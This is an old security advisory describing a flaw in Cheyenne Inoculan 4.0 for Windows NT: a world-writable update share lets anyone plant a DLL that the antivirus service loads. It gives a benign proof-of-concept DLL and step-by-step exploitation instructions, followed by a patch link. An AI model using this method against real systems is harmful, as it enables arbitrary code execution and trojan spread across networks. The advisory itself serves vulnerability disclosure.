COMMAND

    Cheyenne Inoculan

SYSTEMS AFFECTED

    Win NT

PROBLEM

    Paul Boyer found following.  It is possible to run arbitrary  code
    on any  Intel machine  running Cheyenne  Inoculan version  4.0 for
    Windows  NT  (any  version  of  NT)  prior  to  SP2.  Same kind of
    vulnerabilities  might   exist  with   other  anti-virus   product
    providing an auto-update mechanism.

    To  check  if  you  are  vulnerable  (if you have the resource kit
    installed), run SRVCHECK.EXE  \\<YourMachine> else run  srvmgr.exe
    from a  NT server  on the  same domain,  select <YourMachine>  and
    select  "Computer|Shared  Directories".   If  there  is  a  shared
    directory  called  "CHEYUPD$"  that  allows  "FULL CONTROL" to the
    "EVERYONE" group, that's bad news.

    Inoculan runs as a  service, called "Cheyenne InocuLAN  Anti-Virus
    Server". When it starts, it replaces any shared directory with the
    same  name  and  shares  "CHEYUPD$"  with  full  control  for  the
    everyone group.  When the service starts, it does an update  check
    in this directory (usually "C:\Inoculan\Update\" ) using the files
    "<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt"          and
    [idem]...\avh32dll.dll.

    Simply "touching"  or modifying   the file  "filelist.txt" for  it
    looks younger than real causes the update.  The update causes  the
    service to stop, the avh32dll.dll DLL to replace the existing  one
    (usually in c:\inoculan\avh32dll.dll) and then starts the serv ice
    again.  When the service starts, it loads the DLL into memory, and
    THEN does  a lot  of stuff  (including checking  if it  is a valid
    DLL).  The problem is you  can write a DLL that execute  arbitrary
    code at the time it is loaded in memory, at the precise time  when
    DllMain is called by the  image loader, before any other  function
    have a chance to be called...  Exemple (inoctroj.cpp):

    #include "stdio.h"

    long  __stdcall DllMain (long, unsigned long, void*)
    {
    // Any code can goes here. This is an exemple
    // What it does is simply create a file on C: drive root directory
    // and writing "hello world !" inside of it
            FILE * demo;

    // create a file
        demo = fopen ( "C:\\I_can_write_a_file.txt", "w");

    // write to the file
        char * buf = "hello world !      ";
            fwrite (        buf,1, 15, demo);
            fclose ( demo );

    // This aborts the DLL loading. Anyway, we're done at that time ;))
            return 0;
    }

    Compile and link to make the target avh32dll.dll

    Write it to <NtBox>\CHEYUPD$\English\NtIntel\Ready\

    Touch  <NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt  in the
    same directory for it is more recent than initially.

    Stop  the  "Cheyenne  InocuLAN  Anti-Virus  Server" on the <NtBox>
    machine and start it again (alternatively shutdown and restart the
    machine).  Here you are: there is a file  "I_can_write_a_file.txt"
    in "C:\" on <NtBox>.

    An  interesting  point  is  that  Inoculan  uses "domains". In one
    domain,  a  single  server  forwards  the  updates to all machines
    participating in that  "domain" (nothing to  do with NT  domains).
    THIS WAS NO TESTED, but one would expect a much worse scenario  if
    the trojan  is written  to the  inoculan domain's  server CHEYUPD$
    shared directory.  Trojan would be copied to all machines of  that
    domain.  This  is serious, because  all machines would  be running
    arbitrary code in place of the anti-virus program.

SOLUTION

    There's  InocuLAN  for  Windows  NT  Security  Patch.   This patch
    addresses possible security concerns regarding the CHEYUPD$ hidden
    share.  This patch can be applied to builds 269, 270 (Service Pack
    1 level) or build 373 (Service Pack 2A level).  Get it at:

        http://www.cai.com/cheyenne/CheyTech/techbases/ilnt/cheyupd$.html